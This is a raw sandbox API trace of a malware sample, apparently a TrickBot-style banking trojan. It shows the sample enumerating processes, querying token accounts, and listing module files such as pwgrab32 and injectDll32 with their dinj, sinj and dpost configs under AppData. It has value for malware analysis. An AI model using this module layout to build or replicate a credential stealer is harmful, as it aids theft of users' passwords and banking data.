	[0231.185] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.186] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.186] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.187] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.187] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.188] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.188] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.188] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.188] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.189] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0231.189] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0231.190] lstrcmpW (lpString1="explorer.exe", lpString2="dllhost.exe") returned 1
	[0231.190] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.191] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.191] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.192] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.192] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0231.193] CloseHandle (hObject=0x614) returned 1
	[0231.193] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0231.193] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0231.193] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0231.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x614
	[0231.193] OpenProcessToken (in: ProcessHandle=0x614, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x5f8) returned 1
	[0231.193] GetTokenInformation (in: TokenHandle=0x5f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0231.193] GetLastError () returned 0x7a
	[0231.193] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0231.193] GetTokenInformation (in: TokenHandle=0x5f8, TokenInformationClass=0x1, TokenInformation=0x22a5b60, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a5b60, ReturnLength=0x128c98) returned 1
	[0231.193] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a5b68*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0231.221] CloseHandle (hObject=0x5f8) returned 1
	[0231.221] CloseHandle (hObject=0x614) returned 1
	[0231.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eef8
	[0231.221] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0231.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ef98
	[0231.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0231.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311318
	[0231.221] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0231.221] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0231.221] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0231.221] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0231.221] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0231.221] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef98) returned 1
	[0231.221] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311318) returned 1
	[0231.221] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0231.221] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff930) returned 1
	[0231.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0231.221] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0231.221] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0231.221] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0231.221] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0231.221] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0231.221] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0231.221] Sleep (dwMilliseconds=0x4e20) 
	[0231.224] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.224] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0231.224] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.224] GetFileTime (in: hFile=0x614, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.224] CloseHandle (hObject=0x614) returned 1
	[0231.224] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.225] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.225] GetFileTime (in: hFile=0x614, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.225] CloseHandle (hObject=0x614) returned 1
	[0231.225] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.225] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.225] GetFileTime (in: hFile=0x614, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.225] CloseHandle (hObject=0x614) returned 1
	[0231.225] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.225] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0231.225] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.225] GetFileTime (in: hFile=0x614, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.225] CloseHandle (hObject=0x614) returned 1
	[0231.225] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.225] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0231.225] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.226] GetFileTime (in: hFile=0x614, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.226] CloseHandle (hObject=0x614) returned 1
	[0231.226] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.226] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0231.226] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.226] GetFileTime (in: hFile=0x614, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.226] CloseHandle (hObject=0x614) returned 1
	[0231.226] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.226] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0231.226] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0231.226] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0231.226] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6b00
	[0231.226] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0231.226] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0231.226] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0231.226] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8780
	[0231.226] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0231.226] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0231.226] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff930, Size=0x10) returned 0x22ffe70
	[0231.226] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8998
	[0231.226] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0231.226] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0231.227] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffe70, Size=0x10) returned 0x22ff930
	[0231.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745158
	[0231.227] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0231.227] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0231.227] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff930, Size=0x10) returned 0x22ffe70
	[0231.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745370
	[0231.227] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0231.227] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0231.227] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffe70, Size=0x20) returned 0x231ef98
	[0231.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26ae6b0
	[0231.227] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0231.227] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x231ef98, Size=0x20) returned 0x231ef20
	[0231.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26ae8c8
	[0231.227] FindNextFileW (in: hFindFile=0x22b6b00, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 0
	[0231.227] GetLastError () returned 0x12
	[0231.227] FindClose (in: hFindFile=0x22b6b00 | out: hFindFile=0x22b6b00) returned 1
	[0231.227] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0231.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d3b0
	[0231.227] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x24d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0231.227] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.227] GetFileTime (in: hFile=0x614, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.227] CloseHandle (hObject=0x614) returned 1
	[0231.227] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.227] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d3b0) returned 1
	[0231.227] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0231.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d3b0
